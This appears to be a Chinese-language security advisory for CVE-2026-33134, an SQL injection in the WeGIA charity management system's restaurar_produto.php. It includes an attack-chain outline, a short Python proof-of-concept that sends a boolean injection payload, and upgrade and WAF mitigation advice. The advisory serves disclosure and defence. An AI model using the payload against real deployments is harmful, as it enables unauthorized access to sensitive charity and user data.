IPBUF安全漏洞报告
English
CVE-2026-33134 CVSS 9.3 严重

CVE-2026-33134 WeGIA SQL注入漏洞

披露日期: 2026-03-20

漏洞信息

漏洞编号
CVE-2026-33134
漏洞类型
SQL注入
CVSS评分
9.3 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WeGIA

相关标签

SQL注入WeGIAWeb漏洞数据泄露

漏洞概述

WeGIA是一个面向慈善机构的Web管理系统。其在3.6.5及更早版本中发现存在SQL注入漏洞。该漏洞位于`html/matPat/restaurar_produto.php`接口,攻击者可通过操控`id_produto`参数注入恶意SQL代码。由于缺乏参数化查询和输入过滤,这可能导致敏感数据库信息泄露。尽管CVSS评分显示无需权限,但描述指出需认证攻击者利用此漏洞。建议尽快升级至3.6.6版本以消除风险。

技术细节

漏洞核心位于`html/matPat/restaurar_produto.php`文件中。该脚本在处理产品恢复请求时,直接从`$_GET`超全局变量中提取`id_produto`参数,并未对其进行任何安全过滤、类型转换或使用参数化查询。随后,该未经过滤的参数被直接拼接到两条SQL查询字符串中交由数据库执行。这种不安全的编码方式允许攻击者通过构造包含SQL元字符的Payload(如单引号、UNION查询等)篡改SQL语句逻辑。虽然描述指出为“已认证”漏洞,意味着攻击者可能需要登录系统,但一旦通过认证,攻击者即可利用此漏洞实现数据库完全妥协,窃取敏感数据或破坏数据完整性。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标正在使用WeGIA系统,且版本低于或等于3.6.5。
STEP 2
2. 获取认证
根据漏洞描述,攻击者利用合法凭证登录系统(或者利用漏洞无需认证的特性,取决于具体环境配置)。
STEP 3
3. 漏洞利用
攻击者向`html/matPat/restaurar_produto.php`发送特制的GET请求,在`id_produto`参数中注入恶意SQL代码。
STEP 4
4. 数据窃取
数据库执行恶意SQL语句,返回敏感数据(如用户凭证、慈善机构记录),导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual target) url = "http://target/html/matPat/restaurar_produto.php" # Malicious payload to demonstrate SQL Injection # Using a conditional statement to check if the query is manipulatable payload = { "id_produto": "1' AND 1=1-- -" } try: # Send the GET request with the malicious parameter response = requests.get(url, params=payload) # Check if the response indicates successful injection (logic depends on app) if response.status_code == 200: print("[+] Request sent successfully. Check application behavior for potential SQL leakage.") print(f"[+] Response length: {len(response.text)}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

WeGIA <= 3.6.5

防御指南

临时缓解措施
建议立即将系统升级至WeGIA 3.6.6版本以彻底修复此漏洞。如果无法立即升级,应严格限制对`html/matPat/restaurar_produto.php`文件的访问权限,仅允许可信IP或管理员访问,并部署Web应用防火墙(WAF)规则以拦截包含常见SQL注入特征的请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表